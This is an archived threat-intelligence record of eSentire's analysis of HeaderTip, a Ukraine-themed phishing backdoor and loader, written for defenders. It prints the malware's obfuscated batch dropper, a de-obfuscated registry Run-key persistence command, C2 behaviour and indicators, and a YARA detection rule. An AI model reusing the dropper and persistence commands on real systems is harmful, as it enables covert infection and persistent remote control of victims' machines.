{
	"id": "52eddb1b-f6cc-4de7-b57f-8d7751e8d9b7",
	"created_at": "2026-04-06T00:19:01.700784Z",
	"updated_at": "2026-04-10T03:28:35.426938Z",
	"deleted_at": null,
	"sha1_hash": "1f2db31a37b269fba901945fa5bf39118fa46a08",
	"title": "eSentire | Threat Intelligence Malware Analysis: HeaderTip",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1571346,
	"plain_text": "eSentire | Threat Intelligence Malware Analysis: HeaderTip\r\nBy eSentire Threat Response Unit (TRU)\r\nArchived: 2026-04-05 14:22:31 UTC\r\nSince humans are still the weakest link in cybersecurity, threat actor(s) continue to prey on fallible human nature\r\nto launch cyberattacks. As the Russia-Ukraine conflict continues to impact the global economy and draw\r\nworldwide attention, these tensions create opportunities for threat actor(s) to designing campaigns to exploit\r\nhuman vulnerabilities and anxieties stemming from the Russia-Ukraine conflict.\r\nHeaderTip is a malware used by threat actor(s) that are leveraging the current Russia-Ukraine conflict to spread\r\npersistent malware. eSentire Threat Intelligence assesses with high confidence that HeaderTip serves as a\r\nbackdoor and a loader for threat actor(s) to further deploy rootkits, trojans, or other types of malware.\r\neSentire’s Threat Intelligence team has performed a technical malware analysis on HeaderTip. This technical\r\nanalysis provides a breakdown of how HeaderTip achieves the persistence on the infected machine and how it\r\nobfuscates the code to evade detections.\r\nKey Takeaways\r\neSentire Threat Intelligence assesses with high confidence that the initial access vector for HeaderTip was a\r\nphishing attack.\r\nThe threat actor(s) is using obfuscation techniques in the malware sample to hinder the analysis and avoid\r\ndetection.\r\nThe malware achieves the persistence via Registry Run Keys that link to the dropped files in %TEMP%\r\nfolder.\r\nHeaderTip utilizes ChangeIP for Dynamic DNS (DDNS), which allows the attacker(s) to evade detections.\r\neSentire’s Threat Response Unit (TRU) created two new detections to identify the HeaderTip malware.\r\nCase Study\r\nOn March 22, 2022, the Computer Emergency Response Team of Ukraine (CERT-UA) detected the RAR-archive\r\ntranslated as, “The preservation of video materials on criminal actions from Russian military” from a Ukrainian\r\norganization. The malware campaign is dubbed as HeaderTip and is being tracked as UAC-0026.\r\nCERT-UA reported that they observed similar activity in September 2020. In addition, researchers at SentinelOne\r\nhave tied the malware campaign to the suspected Chinese group of threat actors known as Scarab. The Scarab\r\nmalware was first observed in 2012 targeting organizations in Russia, Ukraine, United States, Chile, and Syria.\r\nTechnical Analysis on HeaderTip\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-headertip\r\nPage 1 of 12\n\nThe RAR archive contains an executable with the same naming convention as the archive. The executable has an\r\nembedded PDF file and is not signed. The 32-bit executable is written in C++ programming language with a file\r\nsize of 653 KB.\r\nAn overview of the malicious files, domains and IPs related to HeaderTip (Exhibit 1).\r\nExhibit 1: Overview of HeaderTip malicious files from VirusTotal graph\r\nThe executable file contains the .RCData section with an embedded PDF file which is likely used as a bait. The\r\nPDF document contains information from the National Police of Ukraine with instructions on how to retain video\r\nevidence on criminal activities conducted by the Russian military in Ukraine so they can be used in investigations\r\nby the Criminal Investigative Division of Ukraine (Exhibits 2-3).\r\nThe metadata indicates that the PDF document was created on March 16, 2022, which is the exact date when the\r\ndocument was issued and signed. We assess with high confidence that the document was not forged. The\r\ndocument was written by a native Ukrainian speaker, based on grammatical accuracy and vocabulary.\r\nExhibit 2: The resource containing a PDF header and objects\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-headertip\r\nPage 2 of 12\n\nExhibit 3: The contents of the decoy PDF document\r\nThe second resource contains the dropped .BAT file named “officecleaner.dat” with the following commands:\r\n@echo off\r\nset objfile=%temp%\\httpshelper.dll\r\nif not exist %objfile% (\r\n echo | set /p=\"M%fgopvhrsdfertj%Z\" \u003e %objfile%\r\n type %temp%\\officecleaner.dat \u003e\u003e %objfile%\r\n del %temp%\\officecleaner.dat\r\n re%ooperoitlksdfgljjdfgijtrjg%g add HK%iwejhjkhkl%CU\\Software\\Microsoft\\Windows\\C%ljljlkwjefioflj\r\n start c:\\windows\\system32\\rundll32.exe %objfile%,OAService\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-headertip\r\nPage 3 of 12\n\n) else (\r\nset bat=\"bat\"\r\n)\r\nThe command is responsible for dropping a malicious .DLL (Dynamic Link Library) file (officecleaner.dat) onto\r\nthe %TEMP% folder, appends the MZ (the executable file format used for .EXE files in DOS header) to it and\r\nrenames the officecleaner.dat file as httpshelper.dll. Additionally, the batch file sets up a persistence mechanism\r\nvia Registry Run Keys. The officecleaner.dat file is removed from %TEMP% folder after successfully renaming\r\nitself (Exhibit 4).\r\nThe de-obfuscated command is used to add the Registry Run Key with the key name “OAService” to run the\r\nmalicious httpshelper.dll file:\r\nreg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v \"httpshelper\" /d\r\n\"c:\\windows\\system32\\rundll32.exe httpshelper.dll,OAService\" /f start c:\\windows\\system32\\rundll32.exe\r\nhttpshelper.dll,OAService\r\nExhibit 4: The contents of the .BAT file\r\nThe third resource contains a .DLL file with a missing executable (MZ) header (Exhibit 5).\r\nExhibit 5: Resource containing the .DLL file\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-headertip\r\nPage 4 of 12\n\nUpon analyzing the executable file in a disassembler, we found another value being added to the Registry Run\r\nKeys (Exhibit 6):\r\n /c reg add HKEY_CURRENT_USER\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run /v\r\nhttpsrvlog /t REG_SZ /d\r\nThe added httpsrvlog key is responsible for running the officecleaner.bat file under the %TEMP% directory.\r\nExhibit 6: Registry Run Key added for httpsrvlog value\r\nWe have observed the following files being dropped onto the %TEMP% folder after the running the malicious\r\nexecutable:\r\nofficecleaner.bat: the batch file responsible for persistence of the .DLL file.\r\nofficecleaner.dat: the malicious .DLL file (before the PC reboot or execution of a batch file).\r\nhttpshelper.dll: the malicious .DLL file (after the PC reboot or execution of a batch file)\r\n#2163_02_33-2022.pdf: the decoy PDF file.\r\nAnalyzing the httpshelper.dll file\r\nThe 32-bit .DLL file is written in C++ programming language. The size of the file is relatively small – 9.50 KB.\r\nUpon analyzing the file in a disassembler, we have noticed that the malware is hiding the API imports by applying\r\nthe stackstrings and dynamically resolving APIs at runtime (Exhibit 7).\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-headertip\r\nPage 5 of 12\n\nExhibit 7: Using stackstrings for obfuscation\r\nThe malware hashes the libraries and API functions by applying ROR-13 calculation to evade detections.\r\nLoadLibraryA is used to load the Wininet library, which contains the functions that enables the application to\r\ninteract with HTTP protocol in our malware sample. GetProcAddress API is used to resolve the function’s\r\naddress. (Exhibit 8-9).\r\nExhibit 8: Resolved APIs and kernel32 DLL\r\nExhibit 9: Using GetProcAddress to resolve the functions\r\nThe malicious DLL initiates the connection to the C2 domain over port 8080, the function resides in export named\r\nOAService (Exhibit 10). The threat actor(s) is utilizing Dynamic DNS (DDNS) from ChangeIP with the hardcoded\r\ndomain in the DLL sample, which means that the infected machines can connect to C2 servers using a domain\r\nname instead of IP address. This gives the threat actor(s) a huge benefit as they can change or not have to rely on\r\nIP addresses to avoid detection.\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-headertip\r\nPage 6 of 12\n\nExhibit 10: C2 connection over port 8080\r\nThe main C2 communication function is shown in Exhibit 11. The malware creates a POST request handle, checks\r\nif the request is successfully received from the C2 server with HTTP response code 200, and reads 128 bytes of\r\ndata received from C2 server by calling InternetReadFile API (Exhibit 12). It also uses the User-Agent string,\r\nMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko, for C2 communications.\r\nExhibit 11: Main C2 function\r\nWe have also noticed a function containing a “Loader” string. We believe the function is responsible for loading\r\nthe DLL into the memory by using VirtualAlloc API to allocate new memory regions inside the address space of a\r\nprocess (Exhibit 12). First, it compares if the file contains MZ header, then it loops through the first 4096 bytes of\r\nthe DLL file (Exhibit 13).\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-headertip\r\nPage 7 of 12\n\nExhibit 12: Function checks for the MZ header and calls VirtualAlloc\r\nExhibit 13: The function loops through the first 4096 bytes of the DLL file\r\nWhat eSentire is doing about it\r\nOur Threat Response Unit (TRU) combines threat intelligence obtained from research, security incidents, and the\r\nexternal threat landscape to produce actionable outcomes for our customers. We are taking a holistic response\r\napproach to combat all malware by deploying countermeasures, such as:\r\nImplementing two new detections to identify HeaderTip malware across eSentire MDR (Managed\r\nDetection and Response) for Endpoint solutions.\r\nPerforming global threat hunts against the IOCs (Indicators of Compromise) and known suspicious\r\nactivities associated with the HeaderTip malware.\r\nActively monitoring for any signs of compromise.\r\nOur detection content is supported by investigation runbooks, ensuring our SOC cyber analysts respond rapidly to\r\nany intrusion attempts. In addition, our Threat Response Unit closely monitors the threat landscape and addresses\r\ncapability gaps and performs retroactive threat hunts to assess customer impact.\r\nRecommendations from eSentire’s Threat Response Unit (TRU)\r\nWe recommend implementing the following controls to help secure your organization against HeaderTip malware:\r\nConduct security awareness training to lower the risk of phishing threats.\r\nPatch any external-facing devices and applications on an ongoing basis. Conduct regular vulnerability\r\nscans to ensure your team is staying on top of identifying, and patching, all known vulnerabilities.\r\nEnsure your team is enforcing strong password policies for all employees as part of strengthening your\r\norganization’s overall cyber hygiene.\r\nImplement the Principle of Least Privilege (POLP) that requires giving each user only the permissions\r\nneeded to complete their task and nothing more\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-headertip\r\nPage 8 of 12\n\nWhile the Tactics, Techniques, and Procedures (TTPs) used by threat actor(s) grow in sophistication, they lead to a\r\nlimited set of options at which critical business decisions must be made. Intercepting the various attack paths\r\nutilized by the modern threat actor requires actively monitoring the threat landscape, developing, and deploying\r\nendpoint detection, and the ability to investigate logs \u0026 network data during active intrusions.\r\neSentire’s Threat Response Unit (TRU) is a world-class team of threat researchers who develop new detections\r\nenriched by original threat intelligence and leverage new machine learning models that correlate multi-signal data\r\nand automate rapid response to advanced threats.\r\nIf you are not currently engaged with an MDR provider, eSentire MDR can help you reclaim the advantage and\r\nput your business ahead of disruption.\r\nLearn what it means to have an elite team of Threat Hunters and Researchers that works for you. Connect with an\r\neSentire Security Specialist.\r\nAppendix\r\nSources\r\nhttps://www.sentinelone.com/labs/chinese-threat-actor-scarab-targeting-ukraine/\r\nhttps://cert.gov.ua/article/38097\r\nhttps://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=8bfa7311-fdd9-4f8d-b813-\r\n1ab6c9d2c363\u0026CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68\u0026tab=librarydocuments\r\nIndicators of Compromise\r\nName Indicators\r\nПро збереження\r\nвідеоматеріалів з\r\nфіксацією злочинних дій\r\nармії російської\r\nфедерації.rar\r\n839e968aa5a6691929b4d65a539c2261f4ecd1c504a8ba52abbfbac0774d6fa3\r\n(SHA-256)\r\nПро збереження\r\nвідеоматеріалів з\r\nфіксацією злочинних дій\r\nармії російської\r\nфедерації.exe\r\n042271aadf2191749876fc99997d0e6bdd3b89159e7ab8cd11a9f13ae65fa6b1\r\n(SHA-256)\r\n#2163_02_33-2022.pdf\r\n(decoy PDF)\r\nC0962437a293b1e1c2702b98d935e929456ab841193da8b257bd4ab891bf9f69\r\n(SHA-256)\r\nofficecleaner.dat a2ffd62a500abbd157e46f4caeb91217738297709362ca2c23b0c2d117c7df38\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-headertip\r\nPage 9 of 12\n\nofficecleaner.bat 830c6ead1d972f0f41362f89a50f41d869e8c22ea95804003d2811c3a09c3160\r\nhttpshelper.dll 63a218d3fc7c2f7fcadc0f6f907f326cc86eb3f8cf122704597454c34c141cf1\r\nC2 Domain product2020[.]mrbasic[.]com\r\nIP 104.155.198[.]25\r\nYara Rules\r\nThe Yara rule for the malicious DLL and the executable:\r\nimport \"pe\"\r\nimport \"math\"\r\nrule HeaderTip {\r\n meta:\r\n author = \"eSentire TI\"\r\n date = \"03/27/2022\"\r\n version = \"1.0\"\r\n strings:\r\n $string = \"%016I64x%08x\" wide fullword nocase\r\n $user_agent = \"Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko\" wide fu\r\n $export = \"OAService\"\r\n $dll_name = \"httpshelper.dll\"\r\n $c2_domain = \"product2020.mrbasic.com\" wide fullword nocase\r\n condition:\r\n for any i in (0..pe.number_of_sections - 1): (\r\n math.entropy(pe.sections[i].raw_data_offset, pe.sections[i].raw_data_size) \u003e=6 and\r\n pe.sections[i].name == \".text\") and\r\n all of them and\r\n (uint16(0) == 0x5A4D or uint32(0) == 0x4464c457f)\r\n}\r\nTo learn how your organization can build cyber resilience and prevent business disruption with eSentire’s Next\r\nLevel MDR, connect with an eSentire Security Specialist now.\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-headertip\r\nPage 10 of 12\n\nGET STARTED\r\nABOUT ESENTIRE’S THREAT RESPONSE UNIT (TRU)\r\nThe eSentire Threat Response Unit (TRU) is an industry-leading threat research team committed to helping your\r\norganization become more resilient. TRU is an elite team of threat hunters and researchers that supports our 24/7\r\nSecurity Operations Centers (SOCs), builds threat detection models across the eSentire XDR Cloud Platform, and\r\nworks as an extension of your security team to continuously improve our Managed Detection and Response\r\nservice. By providing complete visibility across your attack surface and performing global threat sweeps and\r\nproactive hypothesis-driven threat hunts augmented by original threat research, we are laser-focused on defending\r\nyour organization against known and unknown threats.\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-headertip\r\nPage 11 of 12\n\nSource: https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-headertip\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-headertip\r\nPage 12 of 12",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-headertip"
	],
	"report_names": [
		"esentire-threat-intelligence-malware-analysis-headertip"
	],
	"threat_actors": [
		{
			"id": "9099912b-a00a-4afb-8294-c6d35af421a1",
			"created_at": "2023-01-06T13:46:39.338108Z",
			"updated_at": "2026-04-10T02:00:03.292102Z",
			"deleted_at": null,
			"main_name": "Scarab",
			"aliases": [],
			"source_name": "MISPGALAXY:Scarab",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e7d03ac8-7d6f-4ea0-83a9-10dff2ea1486",
			"created_at": "2022-10-25T16:07:24.158325Z",
			"updated_at": "2026-04-10T02:00:04.884772Z",
			"deleted_at": null,
			"main_name": "Scarab",
			"aliases": [
				"UAC-0026"
			],
			"source_name": "ETDA:Scarab",
			"tools": [
				"Scieron"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434741,
	"ts_updated_at": 1775791715,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/1f2db31a37b269fba901945fa5bf39118fa46a08.pdf",
		"text": "https://archive.orkl.eu/1f2db31a37b269fba901945fa5bf39118fa46a08.txt",
		"img": "https://archive.orkl.eu/1f2db31a37b269fba901945fa5bf39118fa46a08.jpg"
	}
}